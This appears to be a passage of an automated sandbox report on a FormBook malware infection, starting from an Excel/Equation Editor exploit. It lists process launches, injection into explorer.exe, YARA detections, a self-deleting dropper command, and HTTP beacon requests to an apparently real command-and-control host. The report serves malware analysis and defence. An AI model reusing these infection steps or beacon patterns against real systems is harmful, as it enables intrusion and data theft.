23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 36 38 3b 26 23 32 36 34 31 32 3b 26 23 32 30 32 33 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 32 36 33 36 38 3b 26 23 32 32 38 32 33 3b 26 23 33 30 33 34 30 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 37 34 33 31 3b 26 23
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20122;&#27954;&#32508;&#21512;&#20037;&#20037;&#19968;&#26412;&#20234;&#19968;&#21306;&#44;&#26368;&#26032;&#26368;&#22823;&#30340;&#20122;&#27954;&#65;&#86;&#32593;&#31449;&#44;&#22312;&#32447;&#35266;&#30475;&#20813;&#36153;&#22269;&#20135;&#27431;&#32654;&#19968;&#21306;&#44;&#20037;&#20037;&#32508;&#21512;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;</title><meta name="keywords" content="&#20122;&#27954;&#32508;&#21512;&#20037;&#20037;&#19968;&#26412;&#20234;&#19968;&#21306;&#44;&#26368;&#26032;&#26368;&#22823;&#30340;&#20122;&#27954;&#65;&#86;&#32593;&#31449;&#44;&#22312;&#32447;&#35266;&#30475;&#20813;&#36153;&#22269;&#20135;&#27431;&#32654;&#19968;&#21306;&#44;&#20037;&#20037;&#32508;&#21512;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;" /><meta name="description" content="&#20122;&#27954;&#32508;&#21512;&#20037;&#20037;&#19968;&#26412;&#20234;&#19968;&#21306;&#44;&#26368;&#26032;&#26368;&#22823;&#30340;&#20122;&#27954;&#65;&#86;&#32593;&#31449;&#44;&#22312;&#32447;&#35266;&#30475;&#20813;&#36153;&#22269;&#20135;&#27431;&#


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.2249171156.234.44.4880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Nov 25, 2021 18:13:40.957479000 CET327OUTGET /m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA== HTTP/1.1
                                                  Host: www.clicktoreach.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Nov 25, 2021 18:13:41.200989008 CET328INHTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Thu, 25 Nov 2021 17:13:41 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA==
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Code Manipulations

                                                  Statistics

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Start time:18:11:17
                                                  Start date:25/11/2021
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13f3b0000
                                                  File size:28253536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:11:39
                                                  Start date:25/11/2021
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:11:42
                                                  Start date:25/11/2021
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\Public\vbc.exe"
                                                  Imagebase:0x400000
                                                  File size:305085 bytes
                                                  MD5 hash:1624595E2354FF7BE9E7DC6DEF2ED69E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:18:11:44
                                                  Start date:25/11/2021
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\Public\vbc.exe"
                                                  Imagebase:0x400000
                                                  File size:305085 bytes
                                                  MD5 hash:1624595E2354FF7BE9E7DC6DEF2ED69E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:18:11:47
                                                  Start date:25/11/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0xffa10000
                                                  File size:3229696 bytes
                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:18:12:10
                                                  Start date:25/11/2021
                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                  Imagebase:0xf20000
                                                  File size:2972672 bytes
                                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:18:12:15
                                                  Start date:25/11/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del "C:\Users\Public\vbc.exe"
                                                  Imagebase:0x4a730000
                                                  File size:302592 bytes
                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >